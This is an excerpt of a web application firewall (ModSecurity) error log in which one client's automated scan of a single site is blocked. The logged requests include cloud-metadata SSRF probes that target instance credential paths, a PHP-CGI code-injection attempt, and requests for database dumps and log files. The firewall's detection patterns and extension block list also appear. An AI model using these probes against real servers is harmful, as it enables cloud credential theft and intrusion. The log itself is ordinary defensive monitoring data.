"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/db.sql"] [unique_id "adGQkhw49xiYi6Ae5e2qJgAAAVE"], referer: http://elavocato.net/db.sql [Sun Apr 05 00:28:34.410731 2026] [:error] [pid 20578:tid 20580] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkjh7EGfB2lyFYwlb9AAAAMA"], referer: https://www.bing.com/ [Sun Apr 05 00:28:34.472457 2026] [:error] [pid 20578:tid 20591] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkjh7EGfB2lyFYwlb9gAAAMs"], referer: https://t.co/ [Sun Apr 05 00:28:34.570653 2026] [:error] [pid 19537:tid 19643] [client 212.86.126.157:37836] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo (13337 13); echo base64_decode('X0RfMTMzN19PSw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "elavocato.net"] [uri "/cgi-bin/php-cgi.exe"] [unique_id "adGQkhtU6WDA0ERpu0Za3wAAAIg"], referer: https://t.co/ [Sun Apr 05 00:28:34.571305 2026] [:error] [pid 19537:tid 19643] [client 212.86.126.157:37966] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/storage/logs/laravel.log"] [unique_id "adGQkhtU6WDA0ERpu0Za4AAAAIg"], referer: https://t.co/ [Sun Apr 05 00:28:35.074374 2026] [:error] [pid 20578:tid 20582] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcAAAAAMI"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:35.090555 2026] [:error] [pid 20578:tid 20590] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:url: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcAQAAAMo"], referer: https://t.co/ [Sun Apr 05 00:28:35.101630 2026] [:error] [pid 20578:tid 20603] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcAgAAANc"], referer: https://www.google.com/ [Sun Apr 05 00:28:35.114606 2026] [:error] [pid 20578:tid 20598] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcBAAAANI"], referer: https://www.google.com/ [Sun Apr 05 00:28:35.764140 2026] [:error] [pid 21759:tid 21776] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/data.sql"] [unique_id "adGQkxw49xiYi6Ae5e2qTQAAAU4"], referer: https://www.google.com/ [Sun Apr 05 00:28:35.779746 2026] [:error] [pid 21759:tid 21786] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/dump.sql"] [unique_id "adGQkxw49xiYi6Ae5e2qTwAAAVg"], referer: https://t.co/ [Sun Apr 05 00:28:35.841848 2026] [:error] [pid 20578:tid 20594] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcCwAAAM4"], referer: http://elavocato.net/?uri=http://169.254.169.254/metadata/instance?api-version=2021-02-01 [Sun Apr 05 00:28:35.858584 2026] [:error] [pid 20578:tid 20604] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:uri: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcDQAAANg"], referer: https://www.bing.com/ [Sun Apr 05 00:28:35.868514 2026] [:error] [pid 20578:tid 20582] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:path. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:path: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcDgAAAMI"], referer: https://t.co/ [Sun Apr 05 00:28:35.878568 2026] [:error] [pid 20578:tid 20590] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:path. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:path: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQkzh7EGfB2lyFYwlcDwAAAMo"], referer: https://www.google.com/ [Sun Apr 05 00:28:36.409436 2026] [:error] [pid 20578:tid 20600] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:path. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:path: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcFQAAANQ"], referer: https://www.google.com/ [Sun Apr 05 00:28:36.425463 2026] [:error] [pid 20578:tid 20592] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:path. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:path: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcFgAAAMw"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:36.444057 2026] [:error] [pid 20578:tid 20581] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:proxy. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:proxy: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcFwAAAME"], referer: http://elavocato.net/?proxy=http://169.254.169.254/latest/meta-data/ [Sun Apr 05 00:28:36.460433 2026] [:error] [pid 20578:tid 20587] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:proxy. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:proxy: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcGAAAAMc"], referer: https://www.bing.com/ [Sun Apr 05 00:28:36.917505 2026] [:error] [pid 20578:tid 20585] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:proxy. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:proxy: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcHwAAAMU"], referer: https://www.bing.com/ [Sun Apr 05 00:28:36.928084 2026] [:error] [pid 20578:tid 20598] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:proxy. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://100.100.100.200 found within ARGS:proxy: http://100.100.100.200/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcIAAAANI"], referer: https://www.google.com/ [Sun Apr 05 00:28:36.938832 2026] [:error] [pid 20578:tid 20595] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcIQAAAM8"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:36.949332 2026] [:error] [pid 20578:tid 20583] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlDh7EGfB2lyFYwlcIgAAAMM"], referer: https://www.bing.com/ [Sun Apr 05 00:28:37.206163 2026] [:error] [pid 21759:tid 21763] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/access.log"] [unique_id "adGQlRw49xiYi6Ae5e2qbQAAAUE"], referer: https://t.co/ [Sun Apr 05 00:28:37.225359 2026] [:error] [pid 21759:tid 21766] [client 212.86.126.157:37922] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/laravel.log"] [unique_id "adGQlRw49xiYi6Ae5e2qbgAAAUQ"], referer: http://elavocato.net/laravel.log [Sun Apr 05 00:28:37.272365 2026] [:error] [pid 20578:tid 20599] [client 212.86.126.157:37798] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/debug.log"] [unique_id "adGQlTh7EGfB2lyFYwlcJwAAANM"], referer: https://duckduckgo.com/ [Sun Apr 05 00:28:37.282313 2026] [:error] [pid 20578:tid 20601] [client 212.86.126.157:37798] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/backup.sql"] [unique_id "adGQlTh7EGfB2lyFYwlcKAAAANU"], referer: https://www.google.com/ [Sun Apr 05 00:28:37.376484 2026] [:error] [pid 20578:tid 20593] [client 212.86.126.157:37830] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/metadata/instance?api-version=2021-02-01"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "elavocato.net"] [uri "/"] [unique_id "adGQlTh7EGfB2lyFYwlcKgAAAM0"], referer: https://www.google.com/ [Sun Apr 05 00:28:37.397152 2026] [:error] [pid 6609:tid 6679] [client 212.86.126.157:37886] [client 212.86.126.157] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 